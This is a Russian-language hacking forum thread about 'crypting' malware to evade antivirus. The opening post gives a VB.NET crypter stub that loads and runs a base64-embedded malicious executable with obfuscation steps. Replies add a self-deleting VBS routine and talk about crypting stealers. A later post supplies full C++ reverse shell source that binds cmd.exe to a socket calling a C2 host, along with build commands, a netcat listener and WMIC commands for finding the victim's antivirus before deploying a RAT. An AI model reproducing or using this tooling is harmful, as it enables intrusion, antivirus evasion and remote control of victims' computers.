• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья прячем вредоносный файл (криптовка ехе)

приветствую всех!) В последнее время заметил что у нас не хватает хард-кора как в былые времена) хех, будем исправлять! Представлю Вашему вниманию способ ручной криптовки вредоносного файла на языке visual basic

Открываем visual-studio, создаем новый проект.

Screenshot_2.png



и добавляем простой модуль)


Screenshot_3.png



Screenshot_5.png




и вставляем содержимое:

Код:
module module1
    Dim KvCNAb As String = "OShsVHguqFKtJCNMyhGvWShHHS"
    Dim NysgqucHukACdAGRVasNmKWRyi As String = "CdmNbayBJHNCsymvsRCHsHgHiMGsBrvjyyBSgitAEC"
    Dim uMHACNOFhOTsgkMcHVBCBCBEmS As String = "gOhBcCNEqSiscNMKbEvBhhggtuhCsMNMVGuMhSBgRH"
    Dim hcrucNgRBktbmGsssjqMsCCgVR As String = "hGgcuyWhAOgNcraAACihSurrAhvNNBSFEHsusABmHVRsasrhCFCkNsaCtTvONchNaMitdNCrBWucFsihBChOsWCusrrdcCHCViVuSusVsF"
    Dim FEiarSHNBVCMHgHamsGVcOcAsGsKWaNgycCyCivCSHdVsskAEiKrbtHvgrhsNBBigEMysdmCBgbigANrrNsAcgVJgh As String = "CEMcNHdkuHrgsHHqjVstNHiCEssbrBWmuNBcFjNuvB"
    Dim server() As Byte = Convert.FromBase64String("")
    Dim HdBcVRNtsHAgbOgsHcgaHCcdsuCSVNaAKRsrVJusNFBsOCFgBisbsAusCC As String = "BuHuWWsgFsHVErcNCuFhBBCtcGAFCugsmTVHjShMVa"
    Dim RagWAVdHCWssBHahvWNVBsSsjk As String = "NjshOGGjgFGcrKGdNrbHcJBFNBHJVTNiRaisgqMcKHBsyCmBVaygANKTuVMugFsSHVNuNVSshCrMHNKBsiHggsFJqA"
    Dim KFbuHBAsCNqmWCFABvvhyTsbMOgVcSNKRsNssVMHsO As String = "VvNNimTSNassaTsMgCgsEvVgNKMMicGMmjsCCkgCWKrKuHCkvddNamiWSE"
    Dim ABbACsSMANihrJWMrqgCTssisCasqVJrjHRKCENCgVgaqqWKguRMEBmAVgVKgNNhrNCargVraC As String = "qiGmsAFVghhCNhCgrdAVCBcgMisHTsdTaShtarshMGvasFtrtOFgBHGTjMNHMCKssiNCNTCrEGJMdrHaahCmagKcVF"
    Dim rMEHHuhATCaWhgdMKCigMRshSW As String = "vdCsBhrsvNNKHsSOJkaNHjCvuWuOsuRGKChFNthTyKHuCadaTAHiGRGaVg"
    Sub Main(ByVal kSsAggcSSuvrqFhWaSOisssyNuiWrNqhFcsEMMcSOHGSMrHujghdErsBhCBRMAHyCGSRVVNSHJHhgMHABsCsdghsaA() As String)
        Dim dCVrmTCBsSVvmiFCCSgNFjBhJsgrKhsCCajHgaCrHcmAsCCEgNAjjGmScChBgHCBBbEgHWBNhW As String = "HuMiaharBVNabhyNrsacNdySbcdqgCHHuMRhArGddEHccgOsFHjuaGBHBsCFVasCFaEvqmTvmy"
        Dim NskNhrHRHciVcduFNShNtuJabS As String = "hHhdCVmTGVEsMMsrHRChsGNjcVhOKMsNSFCVgHsCHgbcmsGSNRijkssahHsBaVhCKhNJMahTSFvciyFsdsaVyBiJSHtAhSgNujcBHVNNyT"
        Dim dargShFSBvmWssmmjTcNBhGugK As String = "icsbBskAAShBCFGgNsrrqCSFbmGNKbNBaHcBhHirhmacsCjuuhRsTNVgThKirjqMthcskEsNrS"
        Dim MghjgFBshWatNMsujrackSROmsiEBGEuVHsAgscaaBFiRgcgVkjvvSyNssORmgmCddgdugsiSNCFsCsCMmiiCBAsFu As String = "NHuNMmtNCJSBavMvHiiFbydAiGaRgdhyHviSBsgHsrsByuSdiiEtuRksAi"
        Dim aNiTEBsNvhdvrqMgOmhKuHySGN As String = "BASTVhdCHsNrJJGNbciSCNdVVBkKBqEVgvJBJhHNHh"
        Dim OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj() As Object = New Object(-1) {}
        Dim ssrVSVcrsCEdHFMgCvsNMmdstC As String = "vCGhhJyhChHGrHHHiSrGChSMMBVNsGdrsidTTiuEdgBBccHuGWCNcFdTjF"
        Dim bBuGrTsSCNCgBjtshONtsFsNvN As String = "MkKrCcaSbrBahGFSkVmsGuFSbFKuRcsFCSsciaiisHsvCKyMhvHMsVssar"
        Dim NsSuiHggNsBbFujEaCKhKasrWs As String = "NNVFAOiutsaVhhscjShiGigHJgHuFcMvhgiHBhyiJs"
        Dim SqSrHGSVBaSagASBruNVRHHtNCHhFFCMgSCTGTtEEBhVtRNcJsFiBsaqTNruNiCaBgTmAdstaRHTHybMyyHGNAOiFimshFiVHBhHsdFgqNhHcsuaVByNjKmSHC As String = "jNWNssacsKGNhhumuHCgththCsNBNcHhOMhCvshNCG"
        Dim hhhNdgNSrsNbrEsRsWBVvSBiRGJFvStMSiHWBqvOCc As String = "hCCucrCEsEJWMyaVbvHKhrvbsmHbNCMWgOiOvCgHAKWkacsCMVKChtsMBsCCqhESuusrssCAVyNCCmtiScNsNdAsrS"
        Dim FdcaOVssNNHsivOSyssdgtCrFS As System.Reflection.Assembly = AppDomain.CurrentDomain.Load(server)
        Dim AkrrvKVMFhqigqABssHCiyRMAHyimiNHhCgrsCsCbaaCvSmdCsSbSsjSyc As String = "iBAOAAEHFHcgBsEOyrsFFqrSAg"
        Dim uhgFskGhmJycHBHdubBmsdSdiNHMBSMrrNrcmisrHbWVurbBSdBaNSmsmVSBdVFBBgatchustV As String = "EsCOcsECiCahBsOsKNharsvyGK"
        Dim aNgBBdsugcauqhsOuvhNKhhHgMCBrCsWHCHBhKaEbg As String = "qiiHBcsAWENihCSkVuSaAkOgac"
        Dim viBhsgtvAhurhhtKyVCsWNGsGOWCCyChrBCagEsshkshyMSsHtaNCrHOvG As String = "OdNVcussGcmVGcgaicCSuBbCss"
        Dim CrgBChgHSsSdAhasHtWEGCcVuMMsNsaCsTHrKyHiNRhSsCThETckjMBGAaCGsqNhVNCGhKsANsvAsmHTcbhNuCFMJrrHHgAhaSBqHvNmNBBssuKdCrmiNKdAkCMVhHsAdhGBqHBKCiMhBsGgvssVNhsFSj As String = "sMHHcSHMNaaqGqHENmuNCHqWJs"
        If FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.GetParameters().Length > 0 Then
            Dim CqhTsSdgFckAuAsjHCVFNrNJrGiVEHdBryTEskGMShJGSHKsyaaHsmWhhEcCkjNdsimggEgCHhgHFcNsVhSrNhsskR As String = "OShsVHguqFKtJCNMyhGvWShHHS"
            Dim igFWqCCdmHVisiScvdCrNbbdtHHSEsNNdNAHBcsJCAABiNGqdcKvqbMRKs As String = "FNHiKuBhAHivFTSsuhVNGCWsghEOsNCmgVSGEONaBG"
            Dim cNsMhgsVhAcTcVCmNCsEsAHihH As String = "NNNaiWGySJsOMjCGKastsHckiGsHstHssCusuGFHGsVsGuBOhEJOMmCCGh"
            Dim gAiBigiScbTOrgdquVtCcSqaJH As String = "hiHVBNrmBdHsmdiTVHcAFiMGyMHMNvsssSmCAsNrCtuBCtCghNmaErHigCHHrTMAHCMhycFuTa"
            Dim SsBMbhhBBvcHgSBNAkuhSmWTGN As String = "aNKKuKahrgAiHGCsgikNhsJHgCKgFuSShjshhSCugHJKthsyqKOTjNHshNhKTOHdViSVvBMgKbhrAghGBThAgGFsga"
            OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj = New Object() {FdcaOVssNNHsivOSyssdgtCrFS}
        End If
        Dim tsSvVhMVicMWumNHNHVMvdCSbr As String = "dScVsEBiNsriajSHWHMhHhHTKFMTdbgBSFsMahGgAacJHAMsSSMrEJENCO"
        Dim CdaHNNbKEcNHghTgsHuSgmaBCN As String = "KWchsNHidsyHHVhssbNBNvcHvbNscvNBcshbSstBCa"
        Dim tsctkishNcEcqtjMCsBbssAhaNvrMgBhNKFkbRBsCNiHiOgBBTvRCNqANHsaKgcrsHvmBFghNRhEuhHuACsjNiyHsV As String = "gCssdHhVBScHRHrVhvgqANgMrgFrAiChcMSkMsCautyFhcihJhcgKNNWsNmRrCCNisGgsBvrgi"
        Dim HsrBTsBEHaSAsCSyWsgGCssgBu As String = "uFVuNcAsdJOdOcBvMhVcMajCAdTsshCiqJqKHjHGCOMGssNsWiuaKAHTqu"
        Dim NshRMVicmAaHTGgHmBCjSuJNtj As String = "HqNNusTcVcChHHBWvtHVqEshscABCsANCrdMsFgKMCssHrrVGvsSvsishmCqBsCqdauVWscsBShaCmRCrKkqThABuCShahHkSumhGhNuHd"
        FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.Invoke(Nothing, OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj)
    End Sub

End Module


далее, берем нашу злую приложеньку которая палится всеми "добрыми" антивирусными программами, конвертируем в формат base64 и вставляем в 7-ую строку нашего замечательного модуля)


Screenshot_6.png




почти все готово, далее идем в свойства нашего нашего будущего ангельского приложения.


Screenshot_7.png




Screenshot_8.png



ииииииииииии собираем)


Screenshot_9.png




далее мы его обфусцируем (сожмем в размере и спрячем код) в прожке


Screenshot_10.png



и стартуем)


фсйо наша приложенька стала доброй и пушистой, почти)


а вот и хард-кор :cool: унизу): все как мы любим!



1474329391_7984733_30364111.gif


Good Luck! (гуд-лацк по Русски)


 

LuckyNOOB

Green Team
28.03.2018
51
3
BIT
1
Что сейчас актуально из приватных?
Что сам написал то и актуально)

Так понимаю, ответ на вопрос как сделать чтобы оно еще и самоудалилось я тут не найду

UPD

Вот функция самоудаления если кому-то пригодится.
Код:
Sub Terminate()
        Dim Body As String = "Set fso = CreateObject(""Scripting.FileSystemObject""): On error resume next: Dim I: I = 0" & vbCrLf & _
        "Set File = FSO.GetFile(""" & Application.ExecutablePath & """): Do while I = 0: fso.DeleteFile (""" & Application.ExecutablePath & """): fso.DeleteFile (""" & Application.StartupPath & "\1.vbs""): " & vbCrLf & _
        "If FSO.FileExists(File) = false Then: I = 1: End If: Loop"
        IO.File.WriteAllText(Application.StartupPath & "\1.vbs", Body, System.Text.Encoding.Default)
        Process.Start(Application.StartupPath & "\1.vbs")
    End Sub

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Terminate()
    End Sub
Вставляем в конце программы перед End Module. И вызываем командой Terminate()

Кстати вопрос к автору. Решил я попробовать данный метод иии.. Только хуже. Создать простой проект Hello world который просто создает текстовик. Вот virus total

Вот скрин до:

26749


Вот после:

26751
 
  • Нравится
Реакции: mrtyrel и Tihon49
G

Gnom74

Всем привет! Значить файл. Ехе. Со стиллера не криптуем?
 

gushmazuko

Red Team
24.03.2017
173
451
BIT
0

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 186
BIT
0
Смотря какой стиллак если qwazar какойнить то можно.. или через лодер проливать

Люди вообще форум не читают что ли? Вот же статья про это Meterpreter снова в деле | 100% FUD with Metasploit 5, не только reverse_tcp но и любой payload.
он всегда был в деле)) просто нужно уметь его генерить! )) честно признаюсь сам только не давно к этому пришел, скажу что это не просто, но реально))
 
  • Нравится
Реакции: Tihon49

Tihon49

Green Team
06.01.2018
193
120
BIT
0
  • Нравится
Реакции: mrtyrel и gushmazuko

avbox

New member
20.03.2020
2
0
BIT
0
.
 
Последнее редактирование модератором:

MrBa

Green Team
26.01.2017
76
23
BIT
0
Зарегистрироваться так и не смог.
Error
Unknown server error
 
Последнее редактирование модератором:

avbox

New member
20.03.2020
2
0
BIT
0
.
 
Последнее редактирование модератором:

managerfile2020

New member
13.04.2020
2
0
BIT
0
Привет! Я
приветствую всех!) В последнее время заметил что у нас не хватает хард-кора как в былые времена) хех, будем исправлять! Представлю Вашему вниманию способ ручной криптовки вредоносного файла на языке visual basic

Открываем visual-studio, создаем новый проект.

Посмотреть вложение 19140


и добавляем простой модуль)


Посмотреть вложение 19141


Посмотреть вложение 19142



и вставляем содержимое:

Код:
module module1
    Dim KvCNAb As String = "OShsVHguqFKtJCNMyhGvWShHHS"
    Dim NysgqucHukACdAGRVasNmKWRyi As String = "CdmNbayBJHNCsymvsRCHsHgHiMGsBrvjyyBSgitAEC"
    Dim uMHACNOFhOTsgkMcHVBCBCBEmS As String = "gOhBcCNEqSiscNMKbEvBhhggtuhCsMNMVGuMhSBgRH"
    Dim hcrucNgRBktbmGsssjqMsCCgVR As String = "hGgcuyWhAOgNcraAACihSurrAhvNNBSFEHsusABmHVRsasrhCFCkNsaCtTvONchNaMitdNCrBWucFsihBChOsWCusrrdcCHCViVuSusVsF"
    Dim FEiarSHNBVCMHgHamsGVcOcAsGsKWaNgycCyCivCSHdVsskAEiKrbtHvgrhsNBBigEMysdmCBgbigANrrNsAcgVJgh As String = "CEMcNHdkuHrgsHHqjVstNHiCEssbrBWmuNBcFjNuvB"
    Dim server() As Byte = Convert.FromBase64String("")
    Dim HdBcVRNtsHAgbOgsHcgaHCcdsuCSVNaAKRsrVJusNFBsOCFgBisbsAusCC As String = "BuHuWWsgFsHVErcNCuFhBBCtcGAFCugsmTVHjShMVa"
    Dim RagWAVdHCWssBHahvWNVBsSsjk As String = "NjshOGGjgFGcrKGdNrbHcJBFNBHJVTNiRaisgqMcKHBsyCmBVaygANKTuVMugFsSHVNuNVSshCrMHNKBsiHggsFJqA"
    Dim KFbuHBAsCNqmWCFABvvhyTsbMOgVcSNKRsNssVMHsO As String = "VvNNimTSNassaTsMgCgsEvVgNKMMicGMmjsCCkgCWKrKuHCkvddNamiWSE"
    Dim ABbACsSMANihrJWMrqgCTssisCasqVJrjHRKCENCgVgaqqWKguRMEBmAVgVKgNNhrNCargVraC As String = "qiGmsAFVghhCNhCgrdAVCBcgMisHTsdTaShtarshMGvasFtrtOFgBHGTjMNHMCKssiNCNTCrEGJMdrHaahCmagKcVF"
    Dim rMEHHuhATCaWhgdMKCigMRshSW As String = "vdCsBhrsvNNKHsSOJkaNHjCvuWuOsuRGKChFNthTyKHuCadaTAHiGRGaVg"
    Sub Main(ByVal kSsAggcSSuvrqFhWaSOisssyNuiWrNqhFcsEMMcSOHGSMrHujghdErsBhCBRMAHyCGSRVVNSHJHhgMHABsCsdghsaA() As String)
        Dim dCVrmTCBsSVvmiFCCSgNFjBhJsgrKhsCCajHgaCrHcmAsCCEgNAjjGmScChBgHCBBbEgHWBNhW As String = "HuMiaharBVNabhyNrsacNdySbcdqgCHHuMRhArGddEHccgOsFHjuaGBHBsCFVasCFaEvqmTvmy"
        Dim NskNhrHRHciVcduFNShNtuJabS As String = "hHhdCVmTGVEsMMsrHRChsGNjcVhOKMsNSFCVgHsCHgbcmsGSNRijkssahHsBaVhCKhNJMahTSFvciyFsdsaVyBiJSHtAhSgNujcBHVNNyT"
        Dim dargShFSBvmWssmmjTcNBhGugK As String = "icsbBskAAShBCFGgNsrrqCSFbmGNKbNBaHcBhHirhmacsCjuuhRsTNVgThKirjqMthcskEsNrS"
        Dim MghjgFBshWatNMsujrackSROmsiEBGEuVHsAgscaaBFiRgcgVkjvvSyNssORmgmCddgdugsiSNCFsCsCMmiiCBAsFu As String = "NHuNMmtNCJSBavMvHiiFbydAiGaRgdhyHviSBsgHsrsByuSdiiEtuRksAi"
        Dim aNiTEBsNvhdvrqMgOmhKuHySGN As String = "BASTVhdCHsNrJJGNbciSCNdVVBkKBqEVgvJBJhHNHh"
        Dim OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj() As Object = New Object(-1) {}
        Dim ssrVSVcrsCEdHFMgCvsNMmdstC As String = "vCGhhJyhChHGrHHHiSrGChSMMBVNsGdrsidTTiuEdgBBccHuGWCNcFdTjF"
        Dim bBuGrTsSCNCgBjtshONtsFsNvN As String = "MkKrCcaSbrBahGFSkVmsGuFSbFKuRcsFCSsciaiisHsvCKyMhvHMsVssar"
        Dim NsSuiHggNsBbFujEaCKhKasrWs As String = "NNVFAOiutsaVhhscjShiGigHJgHuFcMvhgiHBhyiJs"
        Dim SqSrHGSVBaSagASBruNVRHHtNCHhFFCMgSCTGTtEEBhVtRNcJsFiBsaqTNruNiCaBgTmAdstaRHTHybMyyHGNAOiFimshFiVHBhHsdFgqNhHcsuaVByNjKmSHC As String = "jNWNssacsKGNhhumuHCgththCsNBNcHhOMhCvshNCG"
        Dim hhhNdgNSrsNbrEsRsWBVvSBiRGJFvStMSiHWBqvOCc As String = "hCCucrCEsEJWMyaVbvHKhrvbsmHbNCMWgOiOvCgHAKWkacsCMVKChtsMBsCCqhESuusrssCAVyNCCmtiScNsNdAsrS"
        Dim FdcaOVssNNHsivOSyssdgtCrFS As System.Reflection.Assembly = AppDomain.CurrentDomain.Load(server)
        Dim AkrrvKVMFhqigqABssHCiyRMAHyimiNHhCgrsCsCbaaCvSmdCsSbSsjSyc As String = "iBAOAAEHFHcgBsEOyrsFFqrSAg"
        Dim uhgFskGhmJycHBHdubBmsdSdiNHMBSMrrNrcmisrHbWVurbBSdBaNSmsmVSBdVFBBgatchustV As String = "EsCOcsECiCahBsOsKNharsvyGK"
        Dim aNgBBdsugcauqhsOuvhNKhhHgMCBrCsWHCHBhKaEbg As String = "qiiHBcsAWENihCSkVuSaAkOgac"
        Dim viBhsgtvAhurhhtKyVCsWNGsGOWCCyChrBCagEsshkshyMSsHtaNCrHOvG As String = "OdNVcussGcmVGcgaicCSuBbCss"
        Dim CrgBChgHSsSdAhasHtWEGCcVuMMsNsaCsTHrKyHiNRhSsCThETckjMBGAaCGsqNhVNCGhKsANsvAsmHTcbhNuCFMJrrHHgAhaSBqHvNmNBBssuKdCrmiNKdAkCMVhHsAdhGBqHBKCiMhBsGgvssVNhsFSj As String = "sMHHcSHMNaaqGqHENmuNCHqWJs"
        If FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.GetParameters().Length > 0 Then
            Dim CqhTsSdgFckAuAsjHCVFNrNJrGiVEHdBryTEskGMShJGSHKsyaaHsmWhhEcCkjNdsimggEgCHhgHFcNsVhSrNhsskR As String = "OShsVHguqFKtJCNMyhGvWShHHS"
            Dim igFWqCCdmHVisiScvdCrNbbdtHHSEsNNdNAHBcsJCAABiNGqdcKvqbMRKs As String = "FNHiKuBhAHivFTSsuhVNGCWsghEOsNCmgVSGEONaBG"
            Dim cNsMhgsVhAcTcVCmNCsEsAHihH As String = "NNNaiWGySJsOMjCGKastsHckiGsHstHssCusuGFHGsVsGuBOhEJOMmCCGh"
            Dim gAiBigiScbTOrgdquVtCcSqaJH As String = "hiHVBNrmBdHsmdiTVHcAFiMGyMHMNvsssSmCAsNrCtuBCtCghNmaErHigCHHrTMAHCMhycFuTa"
            Dim SsBMbhhBBvcHgSBNAkuhSmWTGN As String = "aNKKuKahrgAiHGCsgikNhsJHgCKgFuSShjshhSCugHJKthsyqKOTjNHshNhKTOHdViSVvBMgKbhrAghGBThAgGFsga"
            OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj = New Object() {FdcaOVssNNHsivOSyssdgtCrFS}
        End If
        Dim tsSvVhMVicMWumNHNHVMvdCSbr As String = "dScVsEBiNsriajSHWHMhHhHTKFMTdbgBSFsMahGgAacJHAMsSSMrEJENCO"
        Dim CdaHNNbKEcNHghTgsHuSgmaBCN As String = "KWchsNHidsyHHVhssbNBNvcHvbNscvNBcshbSstBCa"
        Dim tsctkishNcEcqtjMCsBbssAhaNvrMgBhNKFkbRBsCNiHiOgBBTvRCNqANHsaKgcrsHvmBFghNRhEuhHuACsjNiyHsV As String = "gCssdHhVBScHRHrVhvgqANgMrgFrAiChcMSkMsCautyFhcihJhcgKNNWsNmRrCCNisGgsBvrgi"
        Dim HsrBTsBEHaSAsCSyWsgGCssgBu As String = "uFVuNcAsdJOdOcBvMhVcMajCAdTsshCiqJqKHjHGCOMGssNsWiuaKAHTqu"
        Dim NshRMVicmAaHTGgHmBCjSuJNtj As String = "HqNNusTcVcChHHBWvtHVqEshscABCsANCrdMsFgKMCssHrrVGvsSvsishmCqBsCqdauVWscsBShaCmRCrKkqThABuCShahHkSumhGhNuHd"
        FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.Invoke(Nothing, OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj)
    End Sub

End Module


далее, берем нашу злую приложеньку которая палится всеми "добрыми" антивирусными программами, конвертируем в формат base64 и вставляем в 7-ую строку нашего замечательного модуля)


Посмотреть вложение 19143



почти все готово, далее идем в свойства нашего нашего будущего ангельского приложения.


Посмотреть вложение 19144



Посмотреть вложение 19145


ииииииииииии собираем)


Посмотреть вложение 19146



далее мы его обфусцируем (сожмем в размере и спрячем код) в прожке


Посмотреть вложение 19147


и стартуем)


фсйо наша приложенька стала доброй и пушистой, почти)


а вот и хард-кор :cool: унизу): все как мы любим!



Посмотреть вложение 19148

Good Luck! (гуд-лацк по Русски)


установил Visual Studio и уже измучался искать установку модулей. Где и как их поставить. В инете вообще мало про них инфы. У меня нет возможности добавления модуля, нет таких иконок. Помогите с этим пожалуйста!
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 186
BIT
0
Привет! Я

установил Visual Studio и уже измучался искать установку модулей. Где и как их поставить. В инете вообще мало про них инфы. У меня нет возможности добавления модуля, нет таких иконок. Помогите с этим пожалуйста!
в свойствах проекта:
правая кнопка мыши и добавить)

но это уже старая метода!! Уже все по другому делается!
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 186
BIT
0
Приветствую всех, кто интересуется данной темой) Поступает очень много вопросов мне в телеграм и много кто заваливают личку с просьбой пояснить как обходить системы защит, предлогаю следующий вариант обхода, а именно первй этап. Цель данного этапа, заселится в испытуемую машину узнать какой именно у нее установлен АВ и далее вторым этапом обходить АВ , для вашего любомого С2 GUI софта к примеру NJRat или на его основе.

Код, как видите написан на "крестах" что затруднит его детект для большинства АВ, при желании можно его подписать цифровым сертификатом, (желательно от [любимого вами АВ))]) что так же даст нам преимущество.

C++:
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib")
#define DEFAULT_BUFLEN 1024


void RunShell(char* C2Server, int C2Port) {
    while(true) {
        Sleep(5000);    // 5 секунд , рекомендую увеличить.

        SOCKET mySocket;
        sockaddr_in addr;
        WSADATA version;
        WSAStartup(MAKEWORD(2,2), &version);
        mySocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
        addr.sin_family = AF_INET;

        addr.sin_addr.s_addr = inet_addr(C2Server);
        addr.sin_port = htons(C2Port);

        if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL)==SOCKET_ERROR) {
            closesocket(mySocket);
            WSACleanup();
            continue;
        }
        else {
            char RecvData[DEFAULT_BUFLEN];
            memset(RecvData, 0, sizeof(RecvData));
            int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
            if (RecvCode <= 0) {
                closesocket(mySocket);
                WSACleanup();
                continue;
            }
            else {
                char Process[] = "cmd.exe";
                STARTUPINFO sinfo;
                PROCESS_INFORMATION pinfo;
                memset(&sinfo, 0, sizeof(sinfo));
                sinfo.cb = sizeof(sinfo);
                sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
                sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) mySocket;
                CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
                WaitForSingleObject(pinfo.hProcess, INFINITE);
                CloseHandle(pinfo.hProcess);
                CloseHandle(pinfo.hThread);

                memset(RecvData, 0, sizeof(RecvData));
                int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
                if (RecvCode <= 0) {
                    closesocket(mySocket);
                    WSACleanup();
                    continue;
                }
                if (strcmp(RecvData, "exit\n") == 0) {
                    exit(0);
                }
            }
        }
    }
}

int main(int argc, char **argv) {
    FreeConsole();
    if (argc == 3) {
        int port  = atoi(argv[2]);
        RunShell(argv[1], port);
    }
    else {
        char host[] = "192.168.0.1";  // Указываем свой IP адрес, локальный\внешний-постоянный
        int port = 4444;                // Указываем порт.
        RunShell(host, port);
    }
    return 0;
}

Сборка > в Kali-Linux с помощью встроенного компилятора i686-w64-mingw32-g++

Код:
i686-w64-mingw32-g++ test.cpp -o test.exe -lws2_32 -lwininet -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

Прием сессии:
Код:
nc -lvnp <номер порта в нашем случае 4444>
или рекомендую, данной утилитай которая при приеме сессии, автоматом обходит файрволы и ему подобные системы защит более подробно можете ознакомится по ссылке ниже или метасплойтом на тот случай если Вы захотите автоматизировать закрепление в системе или же запуск скрипта для выдачи имени АВ в автоматическом режиме без вашего участия:


Итог:
Сессия прилетела, осталось узнать что охраняет "вражескую" систему Windows. Для этого имеется команда:

Код:
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

или можно узнать список программ которые стартуют автоматически:

Код:
wmic startup list full


Дальше, уже по желаню, можете использовать все как есть, обычно ПРОФИ так и делают) или же как я описывал выше криптовать свой GUI софт под определенный АВ тестирумой системы windows.

NetCat - Наше, Все! (Слова не мои, а одного очень знаменитого Человека.)

Второй этап возможно опишу чуть позднее) с таким не плохим на мой взгляд результатом:
 
Последнее редактирование:
  • Нравится
Реакции: MrBa
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!